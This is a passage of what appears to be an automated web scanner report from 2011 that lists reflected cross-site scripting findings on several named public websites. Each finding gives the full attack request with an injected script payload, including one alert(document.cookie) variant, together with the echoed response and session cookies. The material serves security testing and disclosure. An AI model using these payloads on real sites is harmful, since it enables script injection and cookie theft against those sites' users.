<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!-- tiles layout page => standard_page.jsp --> <!-- <html head ...[SNIP]... <a class="RightNavLink" href="http://my.supermedia.com:80/customersupport/index.jsp?33517"><script>alert(1)</script>270ee3472e7=1&print=ed"> ...[SNIP]...
3.69. http://my.supermedia.com/directoryoptout [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://my.supermedia.com
Path:
/directoryoptout
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37fe3"><script>alert(1)</script>84741f5cfde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /directoryoptout?37fe3"><script>alert(1)</script>84741f5cfde=1 HTTP/1.1 Host: my.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:36:26 GMT Pragma: no-cache Content-Length: 24725 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NLD6RFdXPRTw2vwG1LgBrG7JnC27kyJ154JBgp4LL03M7ljcGhrz!-1173275059!-550558129; path=/ Cache-Control: no-store Connection: close Content-Type: text/html; charset=ISO-8859-1 Server: Unspecified Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:44:01 GMT;path=/;httponly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!-- tiles layout page => standard_page.jsp --> <!-- <html head ...[SNIP]... <a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3"><script>alert(1)</script>84741f5cfde=1&print=ed"> ...[SNIP]...
The value of the 37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e8cf"><script>alert(1)</script>b83041eb0df was submitted in the 37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!-- tiles layout page => standard_page.jsp --> <!-- <html head ...[SNIP]... <a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=11e8cf"><script>alert(1)</script>b83041eb0df&print=ed"> ...[SNIP]...
3.71. http://my.supermedia.com/directoryoptout/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://my.supermedia.com
Path:
/directoryoptout/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a87e3"><script>alert(1)</script>55222cbb99d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!-- tiles layout page => standard_page.jsp --> <!-- <html head ...[SNIP]... <a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=1&a87e3"><script>alert(1)</script>55222cbb99d=1&print=ed"> ...[SNIP]...
3.72. http://my.supermedia.com/directoryoptout/confirm.do [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://my.supermedia.com
Path:
/directoryoptout/confirm.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 319e1"><script>alert(1)</script>a37efd293c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /directoryoptout/confirm.do?319e1"><script>alert(1)</script>a37efd293c2=1 HTTP/1.1 Host: my.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:48:32 GMT Pragma: no-cache Content-Length: 25076 Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-store Connection: close Content-Type: text/html; charset=ISO-8859-1 Server: Unspecified Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:56:08 GMT;path=/;httponly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!-- tiles layout page => standard_page.jsp --> <!-- <html head ...[SNIP]... <a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?319e1"><script>alert(1)</script>a37efd293c2=1&print=ed"> ...[SNIP]...
The value of the 37fe3%22%3E%3Cscript%3Ealert(document.cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1233c"><script>alert(1)</script>6337a742d73 was submitted in the 37fe3%22%3E%3Cscript%3Ealert(document.cookie parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie1233c"><script>alert(1)</script>6337a742d73 HTTP/1.1 Host: my.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:48:24 GMT Pragma: no-cache Content-Length: 24636 Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-store Connection: close Content-Type: text/html; charset=ISO-8859-1 Server: Unspecified Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:55:59 GMT;path=/;httponly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!-- tiles layout page => standard_page.jsp --> <!-- <html head ...[SNIP]... <a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie1233c"><script>alert(1)</script>6337a742d73&print=ed"> ...[SNIP]...
3.74. http://my.supermedia.com/directoryoptout/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://my.supermedia.com
Path:
/directoryoptout/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cb13"><script>alert(1)</script>0d37311fbea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /directoryoptout/index.jsp?7cb13"><script>alert(1)</script>0d37311fbea=1 HTTP/1.1 Host: my.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:48:31 GMT Pragma: no-cache Content-Length: 24551 Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-store Connection: close Content-Type: text/html; charset=ISO-8859-1 Server: Unspecified Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:56:06 GMT;path=/;httponly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!-- tiles layout page => standard_page.jsp --> <!-- <html head ...[SNIP]... <a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?7cb13"><script>alert(1)</script>0d37311fbea=1&print=ed"> ...[SNIP]...
The value of the format request parameter is copied into the HTML document as plain text between tags. The payload c34fc<script>alert(1)</script>1395c3bee03 was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dispatch/?publisher=veoh&list-id=rbox-blended&format=jsonc34fc<script>alert(1)</script>1395c3bee03&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1 Host: trc.taboolasyndication.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 serializer id "jsonc34fc<script>alert(1)</script>1395c3bee03" is not configured. selectionMethod=request-parameter, selectionParam=format, defaultSerializer=xml Date: Thu, 03 Feb 2011 21:44:41 GMT Server: Jetty(6.1.7) P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM" Content-Type: text/html; charset=iso-8859-1 Set-Cookie: taboola_user_id=a72418f5-7573-4033-a20c-768665ba4c71;Path=/;Expires=Fri, 03-Feb-12 21:44:41 GMT Set-Cookie: taboola_session_id_veoh=v1_7d4cc60fd932dcc7937c149c3cdf9f52_a72418f5-7573-4033-a20c-768665ba4c71_1296769481_1296769481;Path=/ Set-Cookie: JSESSIONID=.prod2-f3;Path=/ Set-Cookie: taboola_wv_veoh=4501877959146416130;Path=/;Expires=Fri, 03-Feb-12 21:44:41 GMT Set-Cookie: taboola_rii_veoh=1039225080754099931_5874168958137325309;Path=/;Expires=Fri, 03-Feb-12 21:44:42 GMT Vary: Accept-Encoding Connection: close Content-Length: 4107
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/> <title>Error 500 serializer id "jsonc34fc<script>alert(1)</script>1395c3bee03" is not configured. se ...[SNIP]... <pre>com.taboola.trc.vhf.exceptions.VHFRequestException: serializer id "jsonc34fc<script>alert(1)</script>1395c3bee03" is not configured. selectionMethod=request-parameter, selectionParam=format, defaultSerializer=xml at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.selectSerializer(RecommendationClientAda ...[SNIP]...
The value of the item-type request parameter is copied into the HTML document as plain text between tags. The payload 93a54<script>alert(1)</script>e2384cd3dfb was submitted in the item-type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dispatch/?publisher=veoh&list-id=rbox-blended&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video93a54<script>alert(1)</script>e2384cd3dfb&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1 Host: trc.taboolasyndication.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 No enum const class com.taboola.model.general.RecommendableItem$ItemType.video93a54<script>alert(1)</script>e2384cd3dfb Date: Thu, 03 Feb 2011 21:45:01 GMT Server: Jetty(6.1.7) P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM" Content-Type: text/html; charset=iso-8859-1 Set-Cookie: taboola_user_id=b3bd9e1a-f928-4358-bae5-e232f65ed404;Path=/;Expires=Fri, 03-Feb-12 21:45:01 GMT Set-Cookie: taboola_session_id_veoh=v1_ffd326beb15e99ba266c923fcd06736e_b3bd9e1a-f928-4358-bae5-e232f65ed404_1296769501_1296769501;Path=/ Set-Cookie: JSESSIONID=.prod2-f1;Path=/ Vary: Accept-Encoding Connection: close Content-Length: 4183
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/> <title>Error 500 No enum const class com.taboola.model.general.RecommendableItem$ItemType.video93a54<script&g ...[SNIP]... <pre>java.lang.IllegalArgumentException: No enum const class com.taboola.model.general.RecommendableItem$ItemType.video93a54<script>alert(1)</script>e2384cd3dfb at java.lang.Enum.valueOf(Enum.java:196) at com.taboola.model.general.RecommendableItem$ItemType.valueOf(RecommendableItem.java:69) at com.taboola.trc.data.TextRelatedContentDataSource.getItemType( ...[SNIP]...
The value of the list-id request parameter is copied into the HTML document as plain text between tags. The payload 5b0f1<script>alert(1)</script>7876a2b5e3a was submitted in the list-id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dispatch/?publisher=veoh&list-id=rbox-blended5b0f1<script>alert(1)</script>7876a2b5e3a&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1 Host: trc.taboolasyndication.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 unsupported request id: rbox-blended5b0f1<script>alert(1)</script>7876a2b5e3a, for publisher: PublisherVariant:veoh(default_with_ads) Date: Thu, 03 Feb 2011 21:44:34 GMT Server: Jetty(6.1.7) P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM" Content-Type: text/html; charset=iso-8859-1 Set-Cookie: taboola_user_id=6b3a89d9-b958-41dd-9e3d-cae259e7686f;Path=/;Expires=Fri, 03-Feb-12 21:44:34 GMT Set-Cookie: taboola_session_id_veoh=v1_ef0ffcfd24d42f1d8f2b50542c8bf625_6b3a89d9-b958-41dd-9e3d-cae259e7686f_1296769474_1296769474;Path=/ Set-Cookie: JSESSIONID=.prod2-f3;Path=/ Set-Cookie: taboola_wv_veoh=4501877959146416130;Path=/;Expires=Fri, 03-Feb-12 21:44:34 GMT Vary: Accept-Encoding Connection: close Content-Length: 4111
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/> <title>Error 500 unsupported request id: rbox-blended5b0f1<script>alert(1)</script>7876a2b5e3a, for ...[SNIP]... <pre>com.taboola.trc.vhf.exceptions.VHFConfigurationException: unsupported request id: rbox-blended5b0f1<script>alert(1)</script>7876a2b5e3a, for publisher: PublisherVariant:veoh(default_with_ads) at com.taboola.trc.vhf.viewsHandler.GeneralViewsProducer.handleViewRequest(GeneralViewsProducer.java:336) at com.taboola.trc.vhf.viewsHandler. ...[SNIP]...
The value of the publisher request parameter is copied into the HTML document as plain text between tags. The payload 3cb6d<script>alert(1)</script>b0331f67d92 was submitted in the publisher parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dispatch/?publisher=veoh3cb6d<script>alert(1)</script>b0331f67d92&list-id=rbox-blended&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1 Host: trc.taboolasyndication.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 Invalid publisher name in recommendation request: veoh3cb6d<script>alert(1)</script>b0331f67d92 Date: Thu, 03 Feb 2011 21:44:27 GMT Server: Jetty(6.1.7) P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Connection: close Content-Length: 3330
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/> <title>Error 500 Invalid publisher name in recommendation request: veoh3cb6d<script>alert(1)</script> ...[SNIP]... <pre>com.taboola.trc.vhf.exceptions.VHFConfigurationException: Invalid publisher name in recommendation request: veoh3cb6d<script>alert(1)</script>b0331f67d92 at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.dispatchPrehandling(RecommendationClientAdaptor.java:746) at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.httpClientRequest(Reco ...[SNIP]...
3.79. http://www.bizfind.us/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bizfind.us
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97bfe"><script>alert(1)</script>18ca5e0718d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?97bfe"><script>alert(1)</script>18ca5e0718d=1 HTTP/1.1 Host: www.bizfind.us Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; __utmz=252525594.1296786866.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=252525594.371918977.1296786866.1296786866.1296786866.1; __utmc=252525594; __utmb=252525594.1.10.1296786866
Response
HTTP/1.1 200 OK Date: Fri, 04 Feb 2011 18:00:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 15800 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSSDQDQB=FDMOGJOBLPHILKAOOAOJGEGF; path=/ Cache-control: private
3.80. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bizfind.us
Path:
/15/182221/abc-development-inc/chicago.aspx/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ef9"><script>alert(1)</script>dd38641bfde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /15/182221/abc-development-inc/chicago.aspx/x22?d9ef9"><script>alert(1)</script>dd38641bfde=1 HTTP/1.1 Host: www.bizfind.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 21:48:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 11704 Content-Type: text/html Set-Cookie: ASPSESSIONIDSQQCTAQA=JDEEKNBBLGAHBJGBEKACDHHM; path=/ Cache-control: private
The value of REST URL parameter 6 is copied into the name of an HTML tag attribute. The payload 3c056%20a%3dbd8be886654d was submitted in the REST URL parameter 6. This input was echoed as 3c056 a=bd8be886654d in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns3c056%20a%3dbd8be886654d=%22alert(0x0006C1) HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.bizfind.us
Response
HTTP/1.1 200 OK Date: Fri, 04 Feb 2011 18:01:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 12113 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSSDQDQB=IOMOGJOBLGKMEEODHDPJNBFA; path=/ Cache-control: private
3.82. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21fc8"><script>alert(1)</script>3c5d1bbb05c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)?21fc8"><script>alert(1)</script>3c5d1bbb05c=1 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.bizfind.us
Response
HTTP/1.1 200 OK Date: Fri, 04 Feb 2011 18:00:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 12152 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSSDQDQB=CCMOGJOBOEJLBIDGEPLHOCKP; path=/ Cache-control: private
3.83. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the name of an HTML tag attribute. The payload 55cfe><a>a5947f68df6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)?55cfe><a>a5947f68df6=1 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.bizfind.us
Response
HTTP/1.1 200 OK Date: Fri, 04 Feb 2011 18:00:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 11931 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSSDQDQB=DNLOGJOBDBDLOPJCCANBACKG; path=/ Cache-control: private
3.84. http://www.butterscotch.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.butterscotch.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f74ff'><script>alert(1)</script>d34a3b78cab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f74ff'><script>alert(1)</script>d34a3b78cab=1 HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 231c0'><script>alert(1)</script>53794fb9664 was submitted in the src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?src=tcv3video231c0'><script>alert(1)</script>53794fb9664 HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f0b4'><script>alert(1)</script>f96c8436d8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/A-List2f0b4'><script>alert(1)</script>f96c8436d8c HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8c40"><script>alert(1)</script>23d9018f7a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
